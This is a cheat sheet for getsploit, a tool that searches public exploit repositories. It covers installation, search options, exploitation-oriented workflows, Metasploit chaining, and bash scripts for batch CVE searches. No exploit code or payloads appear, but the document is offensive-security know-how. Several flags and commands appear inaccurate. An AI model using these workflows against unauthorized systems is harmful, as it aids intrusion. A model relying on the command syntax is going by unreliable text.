Salta ai contenuti
1337skills 1337skills - Cheat Sheet

getsploit

Overview

Sezione intitolata “Overview”

getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.

getsploit is essential for:

  • Exploit proof-of-concept research
  • Vulnerability validation and verification
  • Penetration testing and assessment
  • Exploit code adaptation and customization
  • Security research and analysis
  • Attack surface evaluation

Installation

Sezione intitolata “Installation”

Prerequisites

Sezione intitolata “Prerequisites”
  • Python 3.6+
  • pip (Python package manager)
  • Linux/macOS/Windows
  • Internet connectivity

Install via pip

Sezione intitolata “Install via pip”
# Install from PyPI
pip install getsploit

# Verify installation
getsploit -V
getsploit --help

Install from Source

Sezione intitolata “Install from Source”
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit

# Install dependencies
pip install -r requirements.txt

# Run directly
python -m getsploit --help

# Or install locally
pip install -e .

Update

Sezione intitolata “Update”
# Update to latest version
pip install --upgrade getsploit

# Check version
getsploit --version

Core Commands

Sezione intitolata “Core Commands”

Basic Usage

Sezione intitolata “Basic Usage”
CommandPurposeExample
getsploit <query>Search for exploitsgetsploit apache 2.4.49
getsploit -hShow helpgetsploit -h
getsploit -VShow versiongetsploit -V
getsploit --updateUpdate exploit databasegetsploit --update

Search Options

Sezione intitolata “Search Options”
OptionPurposeExample
-e, --edbSearch Exploit-DB onlygetsploit -e "CVE-2021-1234"
-m, --msfSearch Metasploit onlygetsploit -m "windows privilege"
-p, --pstSearch Packet Storm onlygetsploit -p "php vulnerability"
-t, --typeFilter by exploit typegetsploit -t "remote" apache

Basic Search Operations

Sezione intitolata “Basic Search Operations”
Sezione intitolata “Simple Exploit Search”
# Search all repositories
getsploit apache 2.4.49

# Search by CVE number
getsploit CVE-2021-44228

# Search by application
getsploit wordpress

# Search by vulnerability type
getsploit "remote code execution"

Search with Repository Filter

Sezione intitolata “Search with Repository Filter”
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"

# Search Metasploit only
getsploit -m "windows domain privilege"

# Search Packet Storm only
getsploit -p "php injection"

Filter by Exploit Type

Sezione intitolata “Filter by Exploit Type”
# Find remote code execution exploits
getsploit -t "remote" "apache"

# Find local privilege escalation
getsploit -t "local" "kernel"

# Find denial of service
getsploit -t "dos" "dns"

Exploit Database Search Strategies

Sezione intitolata “Exploit Database Search Strategies”

Search by Vulnerability

Sezione intitolata “Search by Vulnerability”
# SQL injection exploits
getsploit "sql injection" wordpress

# Cross-site scripting
getsploit "xss" "drupal"

# Path traversal
getsploit "path traversal" php

# Command injection
getsploit "command injection" web

Search by Application

Sezione intitolata “Search by Application”
# WordPress vulnerabilities
getsploit wordpress

# Drupal exploits
getsploit drupal

# Apache web server
getsploit apache

# PHP framework vulnerabilities
getsploit laravel

Search by OS/Platform

Sezione intitolata “Search by OS/Platform”
# Windows privilege escalation
getsploit -t "local" "windows"

# Linux kernel exploits
getsploit -t "local" "linux kernel"

# macOS vulnerabilities
getsploit -t "remote" "macos"

Advanced Search Techniques

Sezione intitolata “Advanced Search Techniques”

Multi-Term Searches

Sezione intitolata “Multi-Term Searches”
# Combine application and version
getsploit "apache 2.4.49"

# With vulnerability type
getsploit "wordpress 5.0 remote"

# Application and CVE
getsploit "wordpress CVE-2020"

Specific CVE Research

Sezione intitolata “Specific CVE Research”
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228

# WordPress plugin vulnerability
getsploit CVE-2020-6450

# Kernel privilege escalation
getsploit CVE-2021-22555

Vulnerability Pattern Searches

Sezione intitolata “Vulnerability Pattern Searches”
# All Struts vulnerabilities
getsploit "apache struts"

# Tomcat exploits
getsploit "tomcat"

# Node.js vulnerabilities
getsploit "node.js" -t "remote"

Download and Extraction

Sezione intitolata “Download and Extraction”

Download Exploit Code

Sezione intitolata “Download Exploit Code”
# Search returns exploit information
getsploit apache 2.4.49

# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository

View Exploit Details

Sezione intitolata “View Exploit Details”
# Search with verbose output
getsploit -v apache 2.4.49

# Review exploit information before download
# - Author
# - Verification status
# - Last updated date

Save Search Results

Sezione intitolata “Save Search Results”
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt

# Save specific results
getsploit -e "sql injection" > edb_sqli.txt

# Parse results programmatically
getsploit apache 2.4.49 | grep -oE "exploit-[0-9]+|cve-[0-9-]+"

Practical Exploitation Workflows

Sezione intitolata “Practical Exploitation Workflows”

Vulnerability Assessment Workflow

Sezione intitolata “Vulnerability Assessment Workflow”
# 1. Identify target technology
# Example: WordPress 5.0 running

# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"

# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"

# 4. Download promising exploits
# (Follow links from search results)

# 5. Analyze code for applicability
# (Test in lab environment first)

Known CVE Exploitation

Sezione intitolata “Known CVE Exploitation”
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)

# 2. Find exploits
getsploit CVE-2021-44228

# 3. Search specific sources
getsploit -m CVE-2021-44228    # Metasploit modules
getsploit -e CVE-2021-44228    # Exploit-DB POCs

# 4. Select appropriate exploit
# (Choose by platform, method, complexity)

Application-Specific Research

Sezione intitolata “Application-Specific Research”
# 1. Identify running application
# Example: Apache Struts 2.0

# 2. Search comprehensively
getsploit "apache struts"

# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"

# 4. Research by year
getsploit "struts 2009"  # Earlier vulnerabilities
getsploit "struts 2017"  # More recent exploits

Integration with Other Tools

Sezione intitolata “Integration with Other Tools”

Chain with Metasploit

Sezione intitolata “Chain with Metasploit”
# Find exploit in Metasploit
getsploit -m "apache struts"

# Get module path from results
# Load in msfconsole
msfconsole -m "exploit/linux/http/apache_struts_rce"

Integration with searchsploit

Sezione intitolata “Integration with searchsploit”
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"

# Cross-reference with getsploit
getsploit "apache struts" | grep -v "$(searchsploit -t apache struts)"

Organize Results for Testing

Sezione intitolata “Organize Results for Testing”
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt

mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt

# Create index
echo "# Exploit Research Results" > exploit_research/README.md

Exploit Classification and Analysis

Sezione intitolata “Exploit Classification and Analysis”

Classify by Exploitation Method

Sezione intitolata “Classify by Exploitation Method”
# Remote code execution
getsploit -t "remote" "application"

# Privilege escalation
getsploit -t "local" "privilege"

# Denial of service
getsploit -t "dos" "service"

# Authentication bypass
getsploit "authentication bypass" app

Analyze Exploit Reliability

Sezione intitolata “Analyze Exploit Reliability”
# Search for verified/tested exploits
getsploit -e "apache"        # Exploit-DB (verified)

# Search for modules
getsploit -m "wordpress"     # Metasploit (tested)

# Review multiple sources
getsploit -p "wordpress"     # Packet Storm (research)

Filter by Exploit Status

Sezione intitolata “Filter by Exploit Status”
# Recently added exploits
getsploit -e "2024" wordpress

# Older, battle-tested exploits
getsploit -e "2015" linux

# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l

Automation Scripts

Sezione intitolata “Automation Scripts”

Batch Vulnerability Scanning

Sezione intitolata “Batch Vulnerability Scanning”
#!/bin/bash
# Search for exploits for multiple CVEs

CVES=(
  "CVE-2021-44228"
  "CVE-2021-22555"
  "CVE-2020-1938"
)

OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"

for cve in "${CVES[@]}"; do
  echo "Researching $cve..."
  getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
  
  # Count exploits found
  COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
  echo "$cve: $COUNT results found"
done

Vulnerability Database Builder

Sezione intitolata “Vulnerability Database Builder”
#!/bin/bash
# Build database of exploits for target technologies

TARGETS=(
  "wordpress"
  "drupal"
  "joomla"
  "apache"
  "nginx"
)

DB_DIR="exploit_database"
mkdir -p "$DB_DIR"

for target in "${TARGETS[@]}"; do
  echo "Building database for $target..."
  
  # Search all sources
  getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
  getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
  getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
  
  # Create summary
  TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
           $(wc -l < "$DB_DIR/${target}_msf.txt") + \
           $(wc -l < "$DB_DIR/${target}_pst.txt")))
  
  echo "$target: $TOTAL exploits indexed"
done

Continuous Vulnerability Monitoring

Sezione intitolata “Continuous Vulnerability Monitoring”
#!/bin/bash
# Monitor new exploits for critical applications

MONITOR_TARGETS=(
  "wordpress"
  "apache"
  "openssh"
)

RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"

DATE=$(date +%Y%m%d)

for target in "${MONITOR_TARGETS[@]}"; do
  LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
  CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
  
  # Get current exploits
  getsploit "$target" | sort > "$CURRENT_FILE"
  
  # Compare with previous
  if [ -f "$LATEST_FILE" ]; then
    NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
    if [ -n "$NEW_EXPLOITS" ]; then
      echo "New exploits for $target:"
      echo "$NEW_EXPLOITS"
    fi
  fi
  
  # Update latest
  cp "$CURRENT_FILE" "$LATEST_FILE"
done

Search Result Analysis

Sezione intitolata “Search Result Analysis”

Parse Search Results

Sezione intitolata “Parse Search Results”
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u

# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u

# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"

Compare Sources

Sezione intitolata “Compare Sources”
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt

# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt

# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)

# Find in all sources
getsploit wordpress | sort -u > all_wp.txt

Best Practices

Sezione intitolata “Best Practices”

Responsible Exploit Research

Sezione intitolata “Responsible Exploit Research”
  • Verify applicability: Confirm vulnerability affects target before exploitation
  • Test in isolated lab: Always test in controlled environment first
  • Review exploit code: Analyze code for malicious intent before execution
  • Maintain documentation: Track exploit usage for reporting
  • Only test authorized targets: Ensure proper authorization before testing
  • Keep audit trail: Document all exploit testing activities
  • Update regularly: Keep exploit database current with --update

Effective Search Strategies

Sezione intitolata “Effective Search Strategies”
  • Use specific terms: More specific searches yield relevant results
  • Include version numbers: Narrow results with application versions
  • Cross-reference CVEs: Verify CVE numbers with multiple sources
  • Search all repositories: Different sources contain unique exploits
  • Review metadata: Check author, date, and verification status
  • Compare multiple exploits: Select most reliable implementation

Troubleshooting

Sezione intitolata “Troubleshooting”
IssueSolution
No results foundTry broader search terms or different keywords
Connection errorsCheck internet connectivity; verify target is accessible
Old databaseRun getsploit --update to refresh exploit database
Exploit not foundTry searching by CVE number or different terms
Metasploit resultsVerify Metasploit Framework installation for module paths

Update and Maintenance

Sezione intitolata “Update and Maintenance”

Keep Database Current

Sezione intitolata “Keep Database Current”
# Update exploit database
getsploit --update

# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update  # Daily at midnight

Resources

Sezione intitolata “Resources”

Summary

Sezione intitolata “Summary”

getsploit aggregates exploit intelligence from multiple authoritative sources:

  1. Exploit-DB - Largest public exploit repository
  2. Metasploit Framework - Professional exploitation platform
  3. Packet Storm Security - Historical vulnerability research

Key capabilities include:

  • Multi-repository exploit searching
  • Flexible filtering by type and source
  • CVE-based vulnerability research
  • Integration with exploitation frameworks
  • Automated vulnerability monitoring

Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.